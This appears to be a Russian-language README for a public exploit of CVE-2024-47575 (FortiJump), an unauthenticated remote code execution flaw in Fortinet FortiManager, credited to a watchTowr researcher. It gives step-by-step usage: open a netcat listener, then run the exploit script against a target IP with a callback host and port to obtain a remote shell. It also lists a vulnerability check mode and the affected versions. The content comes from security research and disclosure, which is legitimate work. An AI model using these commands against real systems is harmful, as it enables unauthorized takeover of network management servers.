Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager Удаленное выполнение кода без проверки подлинности, также известное как FortiJump CVE-2024-47575
Технические подробности смотрите в нашем блоге.
Для начала установите сеанс ncat:
nc -lvvnp 80
Затем запустите наш генератор артефактов обнаружения:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
Чтобы проверить уязвимость самостоятельно, используйте следующие варианты:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
Этот эксплойт был написан Синой Хейркхой (@SinSinology) из watchTowr (@watchtowrcyber)
Чтобы быть в курсе последних исследований в области безопасности, следите за командой watchTowr Labs.